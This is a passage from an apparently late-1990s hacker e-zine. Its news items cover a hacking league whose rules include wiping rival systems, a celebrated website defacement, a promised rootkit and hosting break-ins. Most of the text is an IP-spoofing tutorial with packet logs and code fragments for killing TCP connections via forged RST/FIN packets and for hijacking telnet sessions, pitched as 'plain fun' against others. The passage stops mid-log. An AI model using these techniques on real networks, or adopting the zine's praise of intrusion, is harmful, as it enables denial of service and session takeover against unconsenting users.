ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. CoreWars : so1o / od|phreak ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ od|phreak was telling me about an idea he had, then called just "Hacker Wars" it was about teams, or groups of hackers who had a league system and hacked each others systems to gain points... We both made sets of rules and decided on a name also, CoreWars...Here are the rules as to date : - 6 hackers per team. - Each team has 2 systems. - The systems must run linux, and be up 24/7. - The game is played from a friday at midnight to a sunday at midnight (48 hours). - On systems owned by the team, each user may have one account, with any systems priveleges. - Each team has 1 account on each enemy system - 2.5mb quota per account - must be a normal user Rules : ------- - super users on opposing teams are NOT allowed to intervine with other hackers, this includes killing, writing to their terminals, or disturbing them in any way shape or form, however, super users are allowed to use snoop and other programs to monitor opposing team members, but they cannot DIRECTLY step in and kill the user. super users CANNOT delete files created by the opposing team members, however they ARE allowed to delete files if they have been MODIFIED, like /etc/motd. - teams conquer a system by forcing it to be shut down, switched off, or any other measure that prevents persons from connecting or using that system. This can include rm'ng the hard drive or any other suitable measure. The Winning Team Is The Last Team With A System That Has Not Been Shut Down. if you shut a system down : 100 points if your system gets shut down : -50 points if you keep both of your systems up : 25 points if you lose both of your systems : -25 points On Sunday midnight, all points are worked out, and the league positions are calculated. These Rules Are Currently Being Changed : http://www.neonunix.org/corewars/ Suggestions to myself or od|phreak... So, if you have a team of 6 that you would like to enter in CoreWars, mail corewars@ with your team name, details, system IP and other relevant information... ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 2. Technophoria Want A Piece Of CodeZero Too? : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Technophoria, based at www.technophoria.com, did *NOT* hack our webpage at www.neonunix.org/codezero/ as i dont even have a l/p to neonunix.org, anyway, they uploaded this shiznit to the page, obviously with neonunix's account, which is the only one on the system... Dont talk shit about Technophoria


-Particle Man

Hmmm, who the fuck is Particle Man?! last time I checked the Technophoria member list it had... Deprave BroncBuster Sludge Acid Angel Modify The Messiah Banshee Now, I dont get on well with Modify or The Messiah (who are in like, 3 other groups each) but Deprave is a good friend, Sludge and Acid I have never met and Bronc is cool. I dont know whats goin down wit that shit, but the last thing I need is some punk trying to say that I write shit about Technophoria, seeing I have never written a thing about them, but anyway, if you do visit the Technophoria WWW site, you will see that sIn and Technophoria are working on the same project with the same people, Utopia (mentioned in the last issue by *ODÝPHREAK*) I wonder who will take the credit and / or release the actual program, hmm..I talked to The Messiah... Utopia will be a encryption utility, release by SIN/Technophoria, written by The Messiah and Fucking Hostile. No release date is given. encryption util? for what purposes? Encrypting files, clipboard, and an editor, like Puffer. thru windoze? Yes. ahh 16 bit. With plans for a 32 bit version. because doesnt pgp do that and alot more? No, it doesn't. what kind of encryption are we talking about? PGP only uses ONE algorithm, IDEA. About 16 different algorithms. and yours will use? RC4, RC5, IDEA, Blowfish, DES, SuperIDEA... I'm still looking into that... isnt that just ripping other peoples shit? blatently No. If so then PGP is ripping. Puffer is ripping. The source for almost all algorihtms is released. So ppl can evaluate it.. what about RC5 source then? Have it. okay... so you have all your algorithms RSA condones non-commercial use of RC4 and RC5. Pretty much. but how will the program work then? Right now I'm wondering which algorihtms to put into it. will it have secret keys and public keys like pgp ? You select an algorihtm, files, and hit encrypt... No, symetric key encryption. One password... isnt that a bit unsecure? I'm making a public key encryption program later on... No, it isn't. seeing then the password will have to be given to the other user over a medium such as IRC You can't transmit keys, true... which can be logged But this isn't for communication as much as file storgae... People can use PGP to transmit keys... so what will the program include? Hmmm... what won't it? I'm hoping to include some steganography in it... It'll be something like Puffer, only WAY better... okzy 1st release will be 16-bit right? Yes... will it have any problems running thru 95 / NT ? Nope. I'm using Win95... will users need .dll files to run it? One. But that'll come included... No VB bullshit... It's made in Delphi, so the runtime library is in the EXE... delphi i code borland c++ Get C++ Builder then... i plan on doing so Like Delphi, but uses C++... okie, l8r cya ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 3. Global kOS News And Questions / Answers : Spidey ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ There have been several rumors circulating about what happened to us since globalkos.org went down. They range from us being busted by feds to stories about purple shrouds and phenobarbital. There have also been rumors about dissention among our ranks and group infighting. Q: What happened to globalkos.org? Did the feds shut it down? Did their ISP shut it down? Did they move their site to keep it hidden? A: Half of us didn't feel like paying for it. We weren't shut down, nor is the site hidden out there somewhere. We're looking into alternatives. Q: Did Acid Angel leave GkOS for Technophoria? A: No. He is working with the guys at Technophoria, but he is still a part of Global kOS. Q: Did Silicon Toad leave the group altogether? A: Somebody came up with this one on the basis of a broken link at globalkos.org. ST moved his site, and no one bothered to update the link. Through some stretch of logic this guy decided it meant ST split. Q: What about Up Yours 4? A: It's slated for release on March 30th. Q: Did GkOS get busted? A: No. Q: I thought Cobra (Vortex, Morbid Disorder, Kludge, or Ryan) was a member of GkOS. A: I've never even heard of these people. They are not present, nor former members. Our members are: Acid Angel Glitch Materva Raven Shadow Hunter Silicon Toad Spidey That Guy Zaven Q: I heard there was a major disagreement within the group, and there's a civil war going on between them. Is it true? A: No. This is completely unfounded. Whoever started this one pulled it straight out of his ass. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 4. www.ncaa.com Hack Makes News : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Conflict member TiK hacked www.ncaa.com, he made TV news, papers, and big internet news, statements from the NCAA and other organisations can be found on www.infowar.com, so1o never believed TiK would or could hack such a site due to the high security levels, but good 'ole TiK proved us all wrong, expect the index.html s00n! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 5. CodeZero To Release sunOS 5.x RootKit : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Yeah, werkin' on it, lewkout!! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 6. Too Many nethosting.com Break-Ins : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ www.hawkee.com and many other "vservers" at nethosting.com have been hacked or attacked, like sinnerz.com (although no damage was done to the site) and so the admin at nethosting can't be very happy with their security, I was talking to hawkee about the hacks into his system by two members of the CodeZero (thats what the numbers stood for - minus 2 from each, turn the 0 into a 26, then 1 = A, 2 = B, 3 = C etc. = CODEZERO) and he was saying that newhosting had really boosted their secruity, this was also the case when access to cough-syrup.nethosting.com was gained by one single hacker, as after the attack, the sendmail version was pumped from 8.8.4 to 8.8.5, nethosting are also considering taking action to prevent certain hosts from having access to the system. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 7. sulfur of #hack to print a bi-monthly magazine : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 15 year old = sulfur, wants to print his own mag, like the 2600, but called Access Denied, supposed to have some good writers, issue 1 will be distributed at SummerCon for free! sulfur writes under the name Edward Givings (initials E.G) and looks like an Emmanuel Goldstein wannabe (initials E.G also!@^) but hes 15, oh well, g00d luck t0 h1m... ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .:. The CodeZero In Assosiation With Dr_Sp00f Presents .:. .:. A Confidence Remains High Production .:. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ -=[ A short (yea right - T_K) overview of IP spoofing: PART I ]=- -=[ Part of Dr_sp00f's Packet Project']=- (Includes Source for Linux 1.3.X and later kernels) All text and Source code written by Dr_Sp00f himself (Copyright 1997) All source tested on Linux kernel 2.0.X All packet data captured with Sniffit 0.3.2 (a pre-release at that time) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PART I: Simple spoofing (Non blind) ----------------------------------- 0. Introduction 0.1 What 0.2 For whom 0.3 Disclaimer 0.4 Licence 1. Short explanation of some words 2. Description of sourcecode 2.1 Source included 2.2 Programmer notes 3. TCP/IP (UDP) in an hazelnutshell 4. Non-blind spoofing 4.1 Know what you are doing 4.2 SYN flooding 4.3 Connection Killing 4.3.1 Using reset (RST) 4.3.2 Closing a connection (FIN) 4.3.3 Improving 4.4 Connection Hijacking 4.5 Other 5. The source code ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PART I: Simple spoofing (Non blind) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 0. Introduction --------------- 0.1 What -------- This document describes some IP spoofing attacks and gives you example source code of the programs used for these attacks (and packet sniffer logs, so you see what exactly happens). It also provides you with an easy to use include file for experimenting a little yourself. Oh, if you make something nice with the "spoofit.h" file, please mail it to me (or a reference where it is available) with a little explanation on what it is (a few lines are enough)... If you have interesting remarks, comment, idea's, ... please contact me Dr_spoof@geocities.com If YOU think of yourself, you are "3>/dev/null or >/dev/echo depends on how smart you are. It is not wise to use what you don't know/understand, so read this before trying anything... it will only take a few minutes, and probably save you some hours of failure... This code is not crippled in the usual way (removing some vital parts), the power is limited by it's briefness, because I wanted to keep everything simple and illustrative (but working). It's a simple job to improve it, and that is the goal of this doc, that you improve it yourself. Special thx to |ExcEEd| and theJUdgE also to all those ppl who deserve it. 0.2 For whom ------------ For people with an elementary knowledge of TCP/IP, some knowledge on C (only the basic setup) and some general UNIX knowledge. It's no use reading this document if you are completely unaware of these things, but mind you, only a little knowledge is enough. 0.3 Disclaimer -------------- I am in no way responsible for the use of this code. By using this software and reading this document you accept the fact that any damage (emotional, physical, dataloss and the end of the world as we know it ...) caused by the use or storage of these programs/documents is not MY responsability. I state that during the writing and testing of this document/source, I never violated any law. All spoofing was done between machines where I had legit root access, or where I had the permission from the legit root. This code can be written by any competent programmer, so this source is not so harmfull as some will say (cauz' I'm sure some people won't like this degree of disclosure). 0.4 Licence ----------- All source code and text is freely available. You can spread it, as long as you don't charge for it (exceptions are a small reproduction fee, if it isn't spread together with commercial software, texts.) You may not spread parts of the document, it should be spread as one package. You may not modify the text and/or source code. You can use the spoofit.h or derived code in your own programs as long as they are not commercial (i.e. FREE), and you give me the credits for it. 1. Short explanation of some words ---------------------------------- This is a short explanation of some words you might see in the text/source. You probably know all this, but I put it in here anyway. Sniffit My favourite Packet Sniffer, all sniffed sequences in this (At time of writing a pre-release 0.3.2) IP-spoofing (further referenced to as spoofing) The forging of IP packets NOTE that not only IP based protocols are spoofed. NOTE that spoofing is also used on a constructive base (LAN spoofing, not discussed here). NOTE that I don't use it on a constructive base ;) Non-blind spoofing Using the spoofing to interfer with a connection that sends packets along your subnet (so generally one of the 2 hosts involved is located on your subnet, or all data traffic has to be passing your network device,... you might consider taking a job at some transatlantic route provider). Blind spoofing Using the spoofing to interfer with a connection (or creating one), that does not send packets along your cable. 2. Description of sourcecode ---------------------------- 2.1 Source included ------------------- spoofit.h The include file that provides some easy to use spoofing functions. To understand the include file and it's functions, read the header of that file for use of the C functions. *.c Example programs (on the use of spoofit.h) that are discussed in this document. Details on these programs are included in the appropriate sections. sniper-rst.c Basic TCP connection killer. (denial-of-services) sniper-fin.c Basic TCP connection killer. (denial-of-services) hijack.c Simple automated telnet connection hijacker. 2.2 Programmer notes -------------------- These programs are just examples. That means, they could be improved a lot. Because I wanted to keep them short and leave some stuff to your imagination, they are very simple. However they all work and are a good starting point. 3. TCP/IP (UDP) in an hazelnutshell ----------------------------------- Because it has been explained enough in 'Phrack Volume Seven, Issue Forty-Eight, File 14 of 18' by daemon9/route/infinity , and there is a lot of documentation available on the subject I will only repeat some things very briefly. (Please read the phrack #48 file or any other document on the subject before reading this). A connection is fully defined with 4 parameters, a source host and port, and a destination host and port. When you make a connection, data is send in packets. Packets take care of low level trafic, and make sure the data arrives (sometimes with special error handling). The spine of most networks is the IP protocol version 4. It is totally independent of all hardware protocols. TCP and UDP are higher level protocols wrapped up in IP packets. All those packets consist of a header and data. IP header contains (amongst other things): IP of source and destination hosts for that packet, and the protocol type of the packet wrapped up in it. (TCP=6, UDP=17, etc.). UDP packets contain (amongst other things): port number of source and destination host. UDP has no such thing as SEQ/ACK, it is a very weak protocol. TCP packets contain (amongst other things): port number of source and destination host, sequence and acknowledge numbers (further refered to as SEQ/ACK), and a bunch of flags. SEQ number: is counted byte per byte, and gives you the number of the NEXT byte to be send, or that is send in this packet. ACK number: is the SEQ number that is expected from the other host. SEQ numbers are chosen at connection initiation. I said is was going to be short... If you didn't understand the above text, read up on it first, because you won't understand sh!t of the rest. 4. Non-blind spoofing --------------------- 4.1 Know what you are doing --------------------------- The concept of non-blind spoofing (NBS further in this doc) is pretty simple. Because packets travel within your reach, you can get the current sequence and acknowledge (SEQ/ACK further in this doc) numbers on the connection. NBS is thus a very easy and accurate method of attack, but limited to connections going over your subnet. In spoofing documentation these attacks are sometimes ommited, because they are mostly 'denial-of-service' attacks, or because people don't realise the advantage a spoof (in particulary a hijack) can have above simple password sniffing. Spoofing in generally is refered to as a verry high level of attack. This refers to blind spoofing (BlS further in this doc), because NBS is kidstuff for a competent coder. 4.2 SYN flooding ---------------- Thoroughly discussed in 'Phrack Volume Seven, Issue Forty-Eight, File 13 of 18'. I won't waste much time on it. Setup: host A <-----][----------X--------------->host B | host S <-----------------/ Concept: Host S impersonates SYN (connection init) coming from host A, to host B. Host A should be unreachable (e.g. turned off, non existant,...). B sends out the second packet of the 3 way TCP handshake. Host B will now wait for response of host A. If host A is reachable it will tell host B (with a reset: RST) that it DID NOT inititate a connection, and thus host B received a bogus packet. (In that case host B will ingnore the SYN, and *normally* nothing will happen) So if A is unreachable, B will wait for response some time. When doing multiple attacks, the backlog of host B is going to be exceeded and host B will not except new connections (read on TCP bugs for additional features ;) for some time. 4.3 Connection Killing ---------------------- Setup: host A <------X------------------------->host B | A,B have a TCP connection running host S <------/ A,S on same subnet (setup is the same in both cases) Use: Clearing mudders of your net, annoying that dude typing an important paper, etc... plain fun. 4.3.1 Using reset (RST) ----------------------- Concept: TCP packets have flags which indicate the status of the packet, like RST. That is a flag used to reset a connection. To be accepted, only the sequence number has to be correct (there is no ACK in a RST packet). So we are going to wait for packets in a connection between A and B. Assume we wait for packets to A. We will calculate (from B's packets) the sequence number for A's packets (from B's ACK's), and fire a bogus RST packet from S (faking to be A) to B. An actual attack: (These are real sniffed packets, although IP numbers of hosts were changed) host A : 166.66.66.1 host B : 111.11.11.11 (S on same subnet as A) (This is a good example of how things not always go as you want, see below for a solution) 1) connection running... we wait for a packet to get current SEQ/ACK (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23 SEQ (hex): 57E1F2A6 ACK (hex): B8BD7679 FLAGS: -AP--- Window: 3400 (data removed because irrelevant, 2 bytes data) 2) This is the ACK of it + included data (witch causes SEQ number to change, and thus messing up our scheme, because this came very fast.) (B->A) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810 SEQ (hex): B8BD7679 ACK (hex): 57E1F2A8 FLAGS: -AP--- Window: 2238 (data removed because irrelevant, 2 bytes data) 3) ACK of it. (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23 SEQ (hex): 57E1F2A8 ACK (hex): B8BD767B FLAGS: -A---- Window: 3400 (data removed because irrelevant) 4) further data (B->A) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810 SEQ (hex): B8BD767B ACK (hex): 57E1F2A8 FLAGS: -AP--- Window: 2238 (data removed because irrelevant) 5) ACK of it (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23 SEQ (hex): 57E1F2A8 ACK (hex): B8BD7691 FLAGS: -A---- Window: 3400 6) Now we get 2 RST packets. How do you explain that? Well, the first reset packet has been buffered somewhere on our system, because the ethernet segment was busy when we wanted to send it. This is the 'unexpected thing' I discussed above, here we are lucky, the data stream cooled down so fast. When it doesn't cool down so fast, we could miss our RST (or the connection will be killed a little later then when we wanted), you'll see some idea's on how to fix that problem. TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810 SEQ (hex): B8BD7679 FLAGS: ---R-- TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810 SEQ (hex): B8BD7691 FLAGS: ---R-- (This was the packet that killed the connection) Discussion of the program: The discussion here is a bit weird , that is because 'sniper-rst.c' is not designed to be an optimal killer, merly to be an example. We have the problem of speed here. We miss some packets what causes those resends. So we would design a better 'sniper' if we do the following: - use blocking IO (not necessarilly, because the RST killer would loose some of it's beauty (looping), this is dealt with in the FIN killer example. Blocking is a little faster when a lot of packets come after each other.) - multi-packet firing... fire more packets with incremented SEQ. (this is commented in the source) - waiting for a pure ACK packet (no data), because otherwise you risk to much of getting mid transmission and not being fast enough. (disadvantage is the 'waiting period' before the connection is killed) NOTE these examples were done on non-loaded networks, with non-loaded servers, what makes it a worst case scenario for speed problems. 4.3.2 Closing a connection (FIN) -------------------------------- Concept: An other flag is FIN and says: "no more data from sender". This flag is used when closing a connection down the normal legit way. So if there was a way to make a packet that is accepted by one of the two hosts, this host would believe the 'sender' didn't have any data left. Following (real) packets would be ignored as they are considered bogus. That's it, because we can sniff the current SEQ/ACK of the connection we can pretend to be either host A or B, and provide the other host with CORRECT packetinformation, and an evil FIN flag. The beauty of it all is, that after a FIN is send the other host always replies with one if it is accepted, so we have a way to verify our killing, and can be 100% sure of success (if for some reason we missed a SEQ or ACK, we can just resend). RST killing is more popular and is prefered, but I've put this in as an example, and I like it myself. An actual attack: (These are real sniffed packets, although IP numbers of hosts were changed) host A : 166.66.66.1 host B : 111.11.11.11 (S on same subnet as A) 1) connection is running.... sniper is started on host S as 'sniper-fin 166.66.66.1 23 111.11.11.11 1072' and waits for a packet to take action (we need to get SEQ/ACK) (mind you switching host A and B would be the same, only S would be impersonating A instead of B) suddenly a packet arrives... (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 SEQ (hex): 19C6B98B ACK (hex): 69C5473E FLAGS: -AP--- Window: 3400 Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 45 E 00 . 00 . 2A * 30 0 5E ^ 40 @ 00 . 40 @ 06 . 5E ^ AD . 9D . C1 . 45 E 33 3 9D . C1 . 2B + 0D . 00 . 17 . 04 . 30 0 19 . C6 . B9 . 8B . 69 i C5 . 47 G 3E > 50 P 18 . 34 4 00 . 3A : 61 a 00 . 00 . 0D . 0A . ~~~~~~~~~ > 2 data bytes 2) sniper detected it, and sends a bogus packet. (S as B -> A) We calculate our SEQ as: ACK of (A->B) packet We calculate our ACK as: SEQ of (A->B) packet + datalength of that packet (19C6B98B + 2 = 19C6B98D) (so we tell A, we received the last packet, and will not transmit further data) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.1072-166.66.66.1.23 SEQ (hex): 69C5473E ACK (hex): 19C6B98D FLAGS: -A---F Window: 7C00 (data removed because irrelevant) 3) host A now says: 'okay, you end the session, so here is my last data' (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 SEQ (hex): 19C6B98D ACK (hex): 69C5473E FLAGS: -AP--- Window: 3400 (data removed because irrelevant) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 SEQ (hex): 19C6B998 ACK (hex): 69C5473F FLAGS: -A---- Window: 3400 (data removed because irrelevant) 4) host A now has flushed its buffer and on his turn FIN's the connection. (A->B) sniper, intercepts this packet and now knows the hosts fell for the spoof and the killing was a success! (host A will no longer accept any data) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 SEQ (hex): 19C6B998 ACK (hex): 69C5473F FLAGS: -A---F Window: 3400 (data removed because irrelevant) 5) We impersonated B, making A believe we had no further data. But B doesn't know that and continues to send packets. (B->A) host A has that connection closed, and thus thinks the real packets of B are spoofed (or at least bogus)! So host A sends some reset packets (RST). TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.1072-166.66.66.1.23 SEQ (hex): 69C5473E ACK (hex): 19C6B98D FLAGS: -A---- Window: 3750 (data removed because irrelevant) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 SEQ (hex): 19C6B98D FLAGS: ---R-- (data removed because irrelevant) 6) This goes on for a couple of packets. Discussion of the program (numbers correspond with those of 'An Actual Attack'): 1) stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,10); if(stat==-1) {printf("Connection 10 secs idle... timeout.\n");exit(1);} We use wait_packet on a non blocking socket. This way we can enable a 10 seconds timeout. This functions returns when the correct packet has been delivered (or timeout). 2) sp_seq=pinfo.ack; sp_ack=pinfo.seq+pinfo.datalen; transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P, sp_seq,sp_ack,ACK|FIN); We calculate a spoofed SEQ/ACK, and fire off a fake FIN packet. As we don't send any data with it, our buffer is set to NULL and datalength to 0. NOTE together with FIN, you need to enable ACK. 3) N/A 4) stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,FIN,5); if(stat>=0) {printf("Killed the connection...\n"); exit(0);} We wait for a FIN packet (note the FIN in wait_packet). We use a 5 sec. timeout, if the function returns and stat>=0 (-1 on timeout), we know our attempt was successfull. 5) N/A 6) N/A NOTE We can have the same problem here as with the RST killer. But didn't have it here, because the packet we responded upon was the end of a data stream (in fact it was an echo from a shell command) 4.3.3 Improving --------------- Except from multipacket firing, it is advised to launch 2 attacks (one in both ways). This illiminates one side oriented connections to be handled optimally. I think of things like downloading data, which is a one way data-flow, it is much easier sending a RST from the (spoofed) receiver to the sender, then the other way around. Those 2 attacks could both impersonate host A and B, and thus giving is 4 times more chance of a succesfull kill. I'll leave further experimenting up to you (use your imagination to handle different situations). 4.4 Connection Hijacking ------------------------ Setup: host A <------X------------------------->host B | A,B have a TCP connection running (TELNET) host S <------/ A,S on same subnet Concept: (suppose a TELNET from A (client) to B (server)) TCP separates good and bogus packets by their SEQ/ACK numbers i.e. B trusts the packets from A because of its correct SEQ/ACK numbers. So if there was a way to mess up A's SEQ/ACK, B would stop believing A's real packets. We could then impersonate to be A, but using correct SEQ/ACK numbers (that is numbers correct for B). We would now have taken over the connection (host A is confused, B thinks nothings wrong (almost correct, see 'actual attack'), and S sends 'correct' data to B). This is called 'Hijacking' a connection. (generally hijacking a TELNET session, but same could be done woth FTP, RLOGIN, etc...) How could we mess up A's SEQ/ACK numbers? Well by simply inserting a data packet into the stream at the right time (S as A->B), the server B would accept this data, and update ACK numbers, A would continue to send it's old SEQ numbers, as it's unaware of our spoofed data. Use: I allready hear you wiseguys yelling: "Hey dude, why hijack a connection if you can sniff those packets anyway??" Well, anybody heared of One Time Passwords, Secure Key?? Case closed.... (S/Key: server challenges client, client and server calculate a code from the challenge and password, and compare that code. The password itself is never send on the cable, so you can't sniff sh!t). (OTP: server has a list of passwords, once one is used, it is destroyed, so sniffing gets you a password that has 'just' expired ;) (ALL types of identification that happen at connection (encrypted or not, trusted or not), and don't use encrypted data transfer, are vulnerable to 'hijacking'.) An actual attack: (These are real sniffed packets, although IP numbers of hosts were changed) (suppose a TELNET from A (client) to B (server)) host A : 166.66.66.1 host B : 111.11.11.11 (S on same subnet as A) 1) connection running... we look with sniffit, and see he's busy in a shell, we start 'hijack' on host S as 'hijack 166.66.66.1 2035 111.11.11.11' a packet containing from (A->B) is detected... hijack takes action... (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223EA ACK (hex): C34A67F6 FLAGS: -AP--- Window: 7C00 Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 45 E 00 . 00 . 29 ) CA . F3 . 40 @ 00 . 40 @ 06 . C5 . 0E . 9D . C1 . 45 E 3F ? 9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # EA . C3 . 4A J 67 g F6 . 50 P 18 . 7C | 00 . 6D m 29 ) 00 . 00 . 6C l ~~~~ 2) host B (server) echo's that databyte (typing 'l' in a bash shell!!!) (you gotta know what you are doing) (B->A) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A67F6 ACK (hex): 5C8223EB FLAGS: -AP--- Window: 